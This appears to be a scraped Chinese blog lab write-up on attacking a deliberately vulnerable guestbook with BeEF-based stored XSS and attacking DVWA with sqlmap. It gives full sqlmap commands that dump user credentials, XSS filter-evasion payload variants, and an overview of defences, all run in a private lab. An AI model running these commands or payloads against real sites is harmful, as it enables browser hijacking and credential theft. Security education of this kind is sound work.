| (超详细)XSS和SQL注入 | 您所在的位置:网站首页 › sql注入漏洞验证怎么做的 › (超详细)XSS和SQL注入 |
(超详细)XSS和SQL注入
|
文章目录
前言实验目的系统环境网络环境实验工具
XSS部分:利用Beef劫持被攻击者客户端浏览器。实验环境搭建。环境搭建参考网站搭建IIS时踩的坑:
1、利用AWVS扫描留言簿网站,发现其存在XSS漏洞。2、 Kali使用beef生成恶意代码3、访问http://留言簿网站/message.asp;将以下恶意代码写入网站留言板4、管理员登录login.htm,账号密码均为admin,审核用户留言。只要客户端访问这个服务器的留言板,客户端浏览器就会被劫持,指定被劫持网站为学校主页,将你在beff中的配置。5、回答问题:实验中XSS攻击属于哪种类型?
SQL注入部分:DVWA+SQLmap+Mysql注入实战实验环境搭建1、注入点发现。首先肯定是要判断是否有注入漏洞。2、枚举当前使用的数据库名称和用户名。sqlmap语法参数踩的坑:
3、枚举数据库用户名和密码4、枚举数据库5、枚举数据库和指定数据库的数据表6、获取指定数据库和表中所有列的信息7、枚举指定数据表中的所有用户名与密码,并down到本地。
实验原理XSS1、什么是XSS2 、什么是XSS攻击3、 什么是Cookie4、XSS漏洞的分类5、XSS的防御5.1基于特征的防御
SQL注入攻击1、什么是SQL注入攻击2、为何会有SQL注入攻击3. 何时使用SQL注入攻击4、MySQL简介5、实施SQL注入攻击5.1. 攻击一5.2 攻击二
6、防范SQL注入方法汇总
tips:关于知识的描述就放在最后了哈~~
前言
实验目的
了解什么是XSS; 了解XSS攻击实施,理解防御XSS攻击的方法; 了解SQL注入的基本原理; 掌握PHP脚本访问MySQL数据库的基本方法; 掌握程序设计中避免出现SQL注入漏洞的基本方法; 掌握网站配置。 系统环境Kali Linux 2、Windows Server、windows10 网络环境交换网络结构 如果虚拟机桥接模式没网的话,可以参考一下这篇博客的情况二:https://blog.csdn.net/id__39/article/details/104275459 实验工具Beef;AWVS(Acunetix Web Vulnarability Scanner);SqlMAP;DVWA XSS部分:利用Beef劫持被攻击者客户端浏览器。 实验环境搭建。角色:留言簿网站。存在XSS漏洞;(IIS或Apache、guestbook搭建) 攻击者:Kali(使用beEF生成恶意代码,并通过留言方式提交到留言簿网站); 被攻击者:访问留言簿网站,浏览器被劫持。 环境搭建参考网站win10IIS搭建参考网站:https://jingyan.baidu.com/article/6079ad0eb37aac28fe86db6a.html windows server2003IIS搭建参考网站: https://blog.csdn.net/haha13l4/article/details/89529674 搭建IIS时踩的坑:刚搭建好的时候,发现登录留言簿网站需要账号密码。(单单这个就阻碍了我好久。。。,以至于后面用awvs怎么扫都扫不到XSS漏洞,一度怀疑我的电脑有问题。。) 解决办法:为网页创建一个如下权限的用户。
kail-2020中应该是没有自带Beef的,我们需要自己安装(默认账号密码是beef beef) sudo apt-get install beef-xss然后cd进入到这个文件夹中: cd /usr/share/beef-xss输入: ./beef即可启动 登录地址: http://192.168.42.128:3000/ui/panel
留言成功
打开Metasploitable2后,里面有搭建好的DVWA,访问http://Metasploitable的IP/dvwa (可能需要先扫描一下内网的ip,确定Metasploitable2的ip地址)并且把安全等级设置为最低喔。 在输入框输入1,结果如下: 此时可以断定有SQL注入漏洞, http://IP地址/DVWA-master/vulnerabilities/sqli/?id=22&Submit=Submit#下面利用SQLMap进行注入攻击。 2、枚举当前使用的数据库名称和用户名。 sqlmap语法参数 -u:指定目标URL --cookie:当前会话的cookies值 -b:获取数据库类型,检查数据库管理系统标识 --current-db:获取当前数据库 --current-user:获取当前数据库使用的用户 --string:当查询可用时用来匹配页面中的字符串 --users:枚举DBMS用户 -password:枚举DBMS用户密码hash详细的sqlmap语法可以looklook这篇博客:https://www.freebuf.com/sectool/164608.html 输入的命令: sqlmap -u "http://192.168.42.131/dvwa/vulnerabilities/sqli/?id=11&Submit=Submit#" --cookie='security=low; PHPSESSID=b9cf186877fb55e131be74681ef9064a' -b --current-db --current-userps:url那块直接复制粘贴,cookie那块可以按f12,在存储栏可以找到,也可以用TamperData弹窗获取。 就是这个都快给我整吐了。。没有注意看url。。只是把ip地址改了一下,跑了我半个小时,没跑出来。。。差点就把自己给笨没了。(注意细节注意细节注意细节。。。) 要把url对应成自己网页的url(有时候可能dvwa的存储文件夹不同,会导致url不一样) 还有前面注入时也要注意一下id是多少,对应的id会有对应的cookie 3、枚举数据库用户名和密码输入的命令: sqlmap -u "http://192.168.42.131/dvwa/vulnerabilities/sqli/?id=11&Submit=Submit#" --cookie='security=low; PHPSESSID=b9cf186877fb55e131be74681ef9064a' --users --password
–dbs:枚举当前数据库 输入的命令: sqlmap -u "http://192.168.42.131/dvwa/vulnerabilities/sqli/?id=11&Submit=Submit#" --cookie='security=low; PHPSESSID=b9cf186877fb55e131be74681ef9064a' --dbs 5、枚举数据库和指定数据库的数据表-D 数据库名:指定数据库 –tables:枚举指定数据库的所有表 输入的命令: sqlmap -u "http://192.168.42.131/dvwa/vulnerabilities/sqli/?id=11&Submit=Submit#" --cookie='security=low; PHPSESSID=b9cf186877fb55e131be74681ef9064a' -D "dvwa" --tables
-D:指定的数据库 -T:指定数据库中的数据表 –columns:获取列的信息 输入的命令: sqlmap -u "http://192.168.42.131/dvwa/vulnerabilities/sqli/?id=11&Submit=Submit#" --cookie='security=low; PHPSESSID=b9cf186877fb55e131be74681ef9064a' -D "dvwa" -T users --columns
-C:枚举数据表中的列 –dump:存储数据表项 输入的命令: sqlmap -u "http://192.168.42.131/dvwa/vulnerabilities/sqli/?id=11&Submit=Submit#" --cookie='security=low; PHPSESSID=b9cf186877fb55e131be74681ef9064a' -D "dvwa" -T users -C “user_id,user,password” --dump
查看 down 到本地的用户名和密码。
XSS又叫CSS (Cross Site Script) 也称为跨站,它是指攻击者利用网站程序对用户输入过滤不足,输入可以显示在页面上对其他用户造成影响的HTML代码,从而盗取用户资料、利用用户身份进行某种动作或者对访问者进行病毒侵害的一种攻击方式。 2 、什么是XSS攻击XSS攻击是指入侵者在远程WEB页面的HTML代码中插入具有恶意目的的数据,用户认为该页面是可信赖的,但是当浏览器下载该页面,嵌入其中的脚本将被解释执行,由于HTML语言允许使用脚本进行简单交互,入侵者便通过技术手段在某个页面里插入一个恶意HTML代码,例如记录论坛保存的用户信息(Cookie),由于Cookie保存了完整的用户名和密码资料,用户就会遭受安全损失。如这句简单的Java脚本就能轻易获取用户信息:alert(document.cookie),它会弹出一个包含用户信息的消息框。入侵者运用脚本就能把用户信息发送到他们自己的记录页面中,稍做分析便获取了用户的敏感信息。 3、 什么是CookieCookie,有时也用其复数形式Cookies,指某些网站为了辨别用户身份、进行session跟踪而储存在用户本地终端上的数据(通常经过加密)。定义于RFC2109(已废弃),最新取代的规范是RFC2965。Cookie最早是网景公司的前雇员Lou Montulli在1993年3月的发明。 Cookie是由服务器端生成,发送给User-Agent(一般是浏览器),浏览器会将Cookie的key/value保存到某个目录下的文本文件内,下次请求同一网站时就发送该Cookie给服务器(前提是浏览器设置为启用Cookie)。Cookie名称和值可以由服务器端开发自己定义,对于JSP而言也可以直接写入jsessionid,这样服务器可以知道该用户是否为合法用户以及是否需要重新登录等。 4、XSS漏洞的分类存储型 XSS:交互形Web应用程序出现后,用户就可以将一些数据信息存储到Web服务器上,例如像网络硬盘系统就允许用户将自己计算机上的文件存储到网络服务器上,然后与网络上的其他用户一起分享自己的文件信息。这种接收用户信息的Web应用程序由于在使用上更加贴近用户需求,使用灵活,使得其成为现代化Web领域的主导。在这些方便人性化的背后也带来了难以避免的安全隐患。 如果有某个Web应用程序的功能是负责将用户提交的数据存储到数据库中,然后在需要时将这个用户提交的数据再从数据库中提取出返回到网页中,在这个过程中,如果用户提交的数据中包含一个XSS攻击语句,一旦Web应用程序准备将这个攻击语句作为用户数据返回到网页中,那么所有包含这个回显信息的网页将全部受到XSS漏洞的影响,也就是说只要一个用户访问了这些网页中的任何一个,他都会遭受到来自该Web应用程序的跨站攻击。Web应用程序过于相信用户的数据,将其作为一个合法信息保存在数据库中,这等于是将一个定时炸弹放进了程序的内部,只要时机一到,这颗定时炸弹就会爆炸。这种因为存储外部数据而引发的XSS漏洞称为Web应用程序的Stored XSS漏洞,即存储型XSS漏洞。 存储型XSS漏洞广泛出现在允许Web用户自定义显示信息及允许Web用户上传文件信息的Web应用程序中,大部分的Web应用程序都属于此类。有一些Web应用程序虽然也属于此类,但是由于该Web应用程序只接受单个管理员的用户数据,而管理员一般不会对自己的Web应用程序做什么破坏,所以这种Web应用程序也不会遭到存储型XSS漏洞的攻击。 DOM-Based XSS漏洞: DOM是Document Object Model(文档对象模型)的缩写。根据W3C DOM规范(http://www.w.org.DOM/),DOM是一种与浏览器、平台、语言无关的接口,使得网页开发者可以利用它来访问页面其他的标准组件。简单解释,DOM解决了Netscape的JavaScript和Microsoft的JScrtipt之间的冲突,给予Web设计师和开发者一个标准的方法,让他们来访问他们站点中的数据、脚本和表现层对象。 由于DOM有如此好的功能,大量的Web应用程序开发者在自己的程序中加入对DOM的支持,令人遗憾的是,Web应用程序开发者这种滥用DOM的做法使得Web应用程序的安全也大大降低,DOM-Based XSS正是在这样的环境下出现的漏洞。DOM-Based XSS漏洞与Stored XSS漏洞不同,因为他甚至不需要将XSS攻击语句存入到数据库中,直接在浏览器的地址栏中就可以让Web应用程序发生跨站行为。对于大多数的Web应用程序来说,这种类型的XSS漏洞是最容易被发现和利用的。 反射型XSS:仅对当次的页面访问产生影响。使得用户访问一个被攻击者篡改后的链接(包含恶意脚本),用户访问该链接时,被植入的攻击脚本被用户浏览器执行,从而达到攻击目的。 5、XSS的防御 5.1基于特征的防御XSS漏洞利用了Web页面的编写不完善,所以每一个漏洞所利用和针对的弱点都不尽相同。这就给XSS漏洞防御带来了困难:不可能以单一特征来概括所有XSS攻击。 传统XSS防御多采用特征匹配方式,在所有提交的信息中都进行匹配检查。对于这种类型的XSS攻击,采用的模式匹配方法一般会需要对“javascript”这个关键字进行检索,一旦发现提交信息中包含“javascript”,就认定为XSS攻击。这种检测方法的缺陷显而易见:黑客可以通过插入字符或完全编码的方式躲避检测。 (1) 在javascript中加入多个tab键,得到 IMG SRC=“jav ascript:alert(‘XSS‘)” 。 (2) 在javascript中加入#x09编码字符,得到 IMG SRC=“javascript:alert(‘XSS‘)” 。 (3) 在javascript中加入字符,得到 IMG SRC=“javascript:alert(‘XSS‘)” 。 (4) 在javascript中的每个字符间加入回车换行符,得到 IMG SRC=“j\r\na\r\nv\r\n\r\na\r\ns\r\nc\r\nr\r\ni\r\np\r\nt\r\n:alert(‘XSS‘)”。 (5) 对"javascript:alert(‘XSS‘)"采用完全编码,得到 IMGSRC=#x6A#x61#x76#x61#x73#x63#x72#x69#x70#x74#x3A#x61#x6C#x65#x72#x74#x28#x27#x58#x53#x53#x27#x29。 上述方法都可以很容易的躲避基于特征的检测。而除了会有大量的漏报外,基于特征的还存在大量的误报可能:在上面的例子中,对"http://www.target.com/javascript/kkk.asp?id=2345"这样一个URL,由于包含了关键字“javascript”,也将会触发报警。 基于代码修改的防御 还有一种方法就是从Web应用开发的角度来避免: (1) 对所有用户提交内容进行可靠的输入验证,包括对URL、查询关键字、HTTP头、POST数据等,仅接受指定长度范围内、采用适当格式、采用所预期的字符的内容来提交,对其他的一律过滤。 (2) 实现Session标记(session tokens)、CAPTCHA系统或者HTTP引用头检查,以防被攻击 。 SQL注入攻击 1、什么是SQL注入攻击所谓SQL注入式攻击,就是攻击者把SQL命令插入到Web表单的输入域或页面请求的查询字符串,欺骗服务器执行恶意的SQL命令。 2、为何会有SQL注入攻击很多电子商务应用程序都使用数据库来存储信息。不论是产品信息,账目信息还是其它类型的数据,数据库都是Web应用环境中非常重要的环节。SQL命令就是前端Web和后端数据库之间的接口,使得数据可以传递到Web应用程序,也可以从其中发送出来。需要对这些数据进行控制,保证用户只能得到授权给他的信息。可是,很多Web站点都会利用用户输入的参数动态的生成SQL查询要求,攻击者通过在URL、表格域,或者其他的输入域中输入自己的SQL命令,以此改变查询属性,骗过应用程序,从而可以对数据库进行不受限的访问。 因为SQL查询经常用来进行验证、授权、订购、打印清单等,所以,允许攻击者任意提交SQL查询请求是非常危险的。通常,攻击者可以不经过授权,使用SQL输入从数据库中获取信息。 3. 何时使用SQL注入攻击当Web应用向后端的数据库提交输入时,就可能遭到SQL注入攻击。可以将SQL命令人为的输入到URL、表格域,或者其他一些动态生成的SQL查询语句的输入参数中,完成上述攻击。因为大多数的Web应用程序都依赖于数据库的海量存储和相互间的逻辑关系(用户权限许可,设置等),所以,每次的查询中都会存在大量的参数。 4、MySQL简介SQL是结构化查询语言的简称,它是全球通用的标准数据库查询语言,主要用于关系型数据的操作和管理,如增加记录,删除记录,更改记录,查询记录等,常用命令知识如表所示。 命令短语 功能 例句 select 用于查询记录和赋值 select i,j,k from A (i,j,k是表A中仅有的列名) select i=‘1’ (将i赋值为字符1) select* from A (含义同第一个例句) update 用于修改记录 update A set i=2 where i=1 (修改A表中i=1的i值为2) insert 用于添加记录 insert into A values(1, ‘2’,3) (向A表中插入一条记录(i,j,k)对应为(1, ‘2’,3)) delete 用于删除记录 delete A where i=2 (删除A标中i=2的所有表项) from 用于指定操作的对象名(表,视图,数据库等的名称) 见 select where 用于指定查询条件 select *from A,B where A.name=B.name and A.id=B.id and 逻辑与 1=1 and 22 not 逻辑非 not 1>1 = 相等关系或赋值 见and、or、not ,>=, |
hook.js里面有自带的恶意代码
点一下右下角的excute,就可以重定向到我的博客啦(没有重定向到学校的网站) 
再次输入1’,报错,返回
【本文地址】